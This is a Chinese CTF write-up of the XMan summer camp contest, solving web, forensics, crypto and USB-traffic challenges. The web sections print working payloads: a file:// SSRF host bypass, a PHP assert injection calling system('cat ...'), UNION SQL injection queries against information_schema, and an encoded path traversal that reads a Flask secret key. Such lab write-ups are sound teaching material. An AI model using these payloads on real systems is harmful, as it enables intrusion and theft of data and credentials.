0x00 : 简介

Xman第三届夏令营个人排位赛,10天的学习见到了梅子酒师傅、麦香师傅、1phan师傅、p0师傅、Xu师傅等等,tqltql.

0x01 : Simple SSRF

flag格式：XMAN{.*}

hint:curl
hint:flag在/etc/flag.txt

hint没出之前在看misc,后来才开始看这题.

考点主要是几个 :

• 用file协议读取本地文件
• 绕过host检查
• 截断url.(这里我使用了#)

payload :

file://www.baidu.com/etc/flag.txt#

XMAN{f1l3_pr0toc0l_1s_us3ful}

0x02 : makeit

flag格式：XMAN{.*}

题目提示git泄露,GitHack拿出来扫一下就能拿到源码.

关键代码

$file = "templates/" . $page . ".php";
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");
assert("file_exists('$file')") or die("That file doesn't exist!");

payload:

/?page=','..')===false and system('cat templates/flag.php');//

构造第二句为 : assert("strpos('','..')===false and system('cat templates/flag.php');//','..')===false") or die("Detected hacking attemp!");

通过闭合前面的语句,同时查询文件,然后注释掉后面的语句,达到目的.

XMAN{flag_is_so_cool}

0x03 : bbsqli

flag格式：XMAN{.*}

题目存在session注入.

' union select 1,database()#   
sqli  #查库名
' union select 1,group_concat(table_name) from information_schema.TABLES where table_schema='sqli'# 
[GDJM_flag],secrets  #查表名
' union select 1,group_concat(column_name) from information_schema.columns where
flag  #查字段名
' union select 1,flag from `[GDJM_flag]`#
xman{YoVr_4R3_a_Bada5s_Ge7_My_Fl4g}  #查flag

0x04 : bbsqli

flag格式：

flag{.*}

直接提供源码.

很显然当session['flag']=true时,就能拿到flag.

而本题的session通过secret_key构造.

那么就可以通过获取secret_key来构造session.

审计代码发现存在目录穿越.

@users.route('/asserts/<path:path>')
def static_handler(path):
    filename = os.path.join(app.root_path,'asserts',path)
    if os.path.isfile(filename):
        return send_file(filename)
    else:
        abort(404)

可在/assert/..%2f..%2f.secret_key获取key,本地搭建环境获取session提交即可获取flag.

0x05 : File

root@kali:~/Desktop# mkdir tmp ; mount task_file.img tmp ; ls -larth tmp
mkdir: cannot create directory ‘tmp’: File exists
total 7.3M
drwx------  2 root root   12K Mar  4  2015 lost+found
-rw-r--r--  1 root root   64K Mar  4  2015 cat.jpg
-rw-r--r--  1 root root  173K Mar  4  2015 cat2.jpg
-rw-r--r--  1 root root   86K Mar  4  2015 cat3.jpg
-rw-r--r--  1 root root   53K Mar  4  2015 cat4.jpg
-rw-r--r--  1 root root  114K Mar  4  2015 cat5.jpg
-rw-r--r--  1 root root   72K Mar  4  2015 cat6.jpg
-rw-r--r--  1 root root   67K Mar  4  2015 cat7.jpg
-rw-r--r--  1 root root   49K Mar  4  2015 cat8.jpg
-rw-r--r--  1 root root  500K Mar  4  2015 catdog.gif
-rw-r--r--  1 root root  805K Mar  4  2015 catgif.gif
-rw-r--r--  1 root root  2.0M Mar  4  2015 catsipsip.gif
-rw-r--r--  1 root root   70K Mar  4  2015 catreindeer.jpg
-rw-r--r--  1 root root   36K Mar  4  2015 catyum.gif
-rw-r--r--  1 1000 users 1.1M Mar  4  2015 catfunnyface.jpg
-rw-r--r--  1 1000 users 2.0M Mar  4  2015 catcuddle.gif
-rw-r--r--  1 1000 users 203K Mar  4  2015 catwindow.jpg
drwxr-xr-x  3 root root  1.0K Mar  4  2015 .
drwxr-xr-x 18 root root  4.0K Aug 10 13:35 ..

但是镜像有10M,估计还藏着其他东西,上工具.

root@kali:~/Desktop# extundelete --restore-all task_file.img 
NOTICE: Extended attributes are not restored.
WARNING: EXT3_FEATURE_INCOMPAT_RECOVER is set.
The partition should be unmounted to undelete any files without further data loss.
If the partition is not currently mounted, this message indicates 
it was improperly unmounted, and you should run fsck before continuing.
If you decide to continue, extundelete may overwrite some of the deleted
files and make recovering those files impossible.  You should unmount the
file system and check it with fsck before using extundelete.
Would you like to continue? (y/n) 
y
Loading filesystem metadata ... 2 groups loaded.
Loading journal descriptors ... 146 descriptors loaded.
Searching for recoverable inodes in directory / ... 
2 recoverable inodes found.
Looking through the directory structure for deleted files ... 
1 recoverable inodes still lost.
root@kali:~/Desktop# cd R
RECOVERED_FILES/            RSA-and-LLL-attacks-master/
ROPgadget/                  
root@kali:~/Desktop# cd RECOVERED_FILES/
root@kali:~/Desktop/RECOVERED_FILES# ls -larth
total 24K
-rw-r--r--  1 root root  12K Aug 10 13:36 file.17
-rw-r--r--  1 root root   54 Aug 10 13:36 .cat.jpg
drwxr-xr-x 19 root root 4.0K Aug 10 13:36 ..
drwxr-xr-x  2 root root 4.0K Aug 10 13:36 .
root@kali:~/Desktop/RECOVERED_FILES# file file.17 .cat.jpg
file.17:  Vim swap file, version 7.4
.cat.jpg: data
root@kali:~/Desktop/RECOVERED_FILES# cat .cat.jpg
flag{fugly_cats_need_luv_2}
root@kali:~/Desktop/RECOVERED_FILES# cat file.17 
b0VIM 7.4�
U3210#"! Utp



ad��
�f l a g { f u g l y _ c a t s _ n e e d _ l u v _ 2 }root@kali:~/Desktop/RECOVERED_FILES# 

0x06 : XMan通行证

xman最强王者开始了，拿到通行证，开始你的王者之路。

XMan通行证flag格式:xman{.*}

hint:这是个签到题；
hint:base64解码
进行栅栏密码加密
使用凯撒密码进行解密

(我做过的最难的签到题)

因为做的人太少结果把writeup放完了,这也太真实了...(放了我也不会)

a2FuYmJyZ2doamx7emJfX19ffXZ0bGFsbg==
base64
kanbbrgghjl{zb____}vtlaln
栅栏(7)
kzna{blnl_abj_lbh_trg_vg}
凯撒
xman{oyay_now_you_get_it}

0x07 : ppap

flag格式：flag{.*}

流量包有一大串的base64,尝试解密发现jpg文件头.

写个脚本将base64解密后写入文件

#!usr/bin/env python
#-*- coding:utf -*-

import base64

f=open('1.txt','r')

f1=open('1.jpg','w')

content=''


for str in f.readlines():
    content = base64.b64decode(str)
    f1.write(content)

f1.close()

解密到一半发生报错,发现base64中间还有一段英文.

分析到最后很轻易发现有三个文件,一个包含很多jpg文件的jpg,一个zip文件,一个xml文件.

zip文件里面有flag.txt,而且加密,显然是拿到密码.

这里没什么思路,google了一下没想到找到原题....僵

0x08 : autokey

flag格式：flag{.*}

这题比赛时没做出来,但只差最后一步,所以写下来.

首先是经典的提取usb流量

tshark.txt -r task_AutoKey.pcapng -T fields -e usb.data > usb.txt

网上找个脚本解密usb流量.

#!usr/bin/env python
#-*- coding:utf-8 -*-

mappings = { 0x04:"A",  0x05:"B",  0x06:"C", 0x07:"D", 0x08:"E", 0x09:"F", 0x0A:"G",  0x0B:"H", 0x0C:"I",  0x0D:"J", 0x0E:"K", 0x0F:"L", 0x10:"M", 0x11:"N",0x12:"O",  0x13:"P", 0x14:"Q", 0x15:"R", 0x16:"S", 0x17:"T", 0x18:"U",0x19:"V", 0x1A:"W", 0x1B:"X", 0x1C:"Y", 0x1D:"Z", 0x1E:"1", 0x1F:"2", 0x20:"3", 0x21:"4", 0x22:"5",  0x23:"6", 0x24:"7", 0x25:"8", 0x26:"9", 0x27:"0", 0x28:"\n", 0x2a:"[DEL]",  0X2B:"    ", 0x2C:" ",  0x2D:"-", 0x2E:"=", 0x2F:"[",  0x30:"]",  0x31:"\\", 0x32:"~", 0x33:";",  0x34:"'", 0x36:",",  0x37:"." }
nums = []
keys = open('usbdata.txt')
for line in keys:
    if line[0]!='0' or line[1]!='0' or line[3]!='0' or line[4]!='0' or line[9]!='0' or line[10]!='0' or line[12]!='0' or line[13]!='0' or line[15]!='0' or line[16]!='0' or line[18]!='0' or line[19]!='0' or line[21]!='0' or line[22]!='0':
         continue
    nums.append(int(line[6:8],16))
keys.close()
output = ""
for n in nums:
    if n == 0 :
        continue
    if n in mappings:
        output += mappings[n]
    else:
        output += '[unknown]'
print 'output :\n' + output

拿到:

output :
[unknown]A[unknown]UTOKEY''.DECIPHER'[unknown]MPLRVFFCZEYOUJFJKYBXGZVDGQAURKXZOLKOLVTUFBLRNJESQITWAHXNSIJXPNMPLSHCJBTYHZEALOGVIAAISSPLFHLFSWFEHJNCRWHTINSMAMBVEXO[DEL]PZE[DEL]IZ'

这里将[unknown]去掉,[DEL]是去掉后面一个字符,最后得到

AUTOKEY''.DECIPHER'MPLRVFFCZEYOUJFJKYBXGZVDGQAURKXZOLKOLVTUFBLRNJESQITWAHXNSIJXPNMPLSHCJBTYHZEALOGVIAAISSPLFHLFSWFEHJNCRWHTINSMAMBVEXOZEZ'

这里看到autokey和题目吻合,字符串形式很像密文,于是百度了autokey加密,提示需要关键字，也可以理解为密钥.

但是我没看到密钥,于是写了个脚本爆破.

#!usr/bin/env python
#-*- coding:utf-8 -*-

from pycipher import Autokey
import itertools as its

dictionary='QWERTYUIOPASDFGHJKLZXCVBNM'
r=its.product(dictionary,repeat=4)
f=open('flag.txt','w')

for i in r:
    a = Autokey("".join(i)).decipher('MPLRVFFCZEYOUJFJKYBXGZVDGQAURKXZOLKOLVTUFBLRNJESQITWAHXNSIJXPNMPLSHCJBTYHZEALOGVIAAISSPLFHLFSWFEHJNCRWHTINSMAMBVEXPZIZ')
#    print "".join(i)
#    print a
    f.write("".join(i))
    f.write("\n")
    f.write(a)
    f.write("\n")
f.close()

通过修改repeat参数来指定位数爆破,在密钥为hell拿到一个看着像flag的字符串.

>>> print Autokey('hell').decipher('MPLRVFFCZEYOUJFJKYBXGZVDGQAURKXZOLKOLVTUFBLRNJESQITWAHXNSIJXPNMPLSHCJBTYHZEALOGVIAAISSPLFHLFSWFEHJNCRWHTINSMAMBVEXOZEZ')
FLAGQUFWJKTSLZMRZZPGHAGXZQUXSUDCWRHMPEMIQXZJXMFJTWONHLJALXAXEQMSHCVKCZYOFAGMGOAJCMAZQGPMPBWTDVJLEOERNIDCVFPKFHMLZQCOFJ

然而并不是flag....思路就此打住.

晚上看日志发现有的师傅usb流量就能解到flag,羡慕死了希望师傅教我写脚本.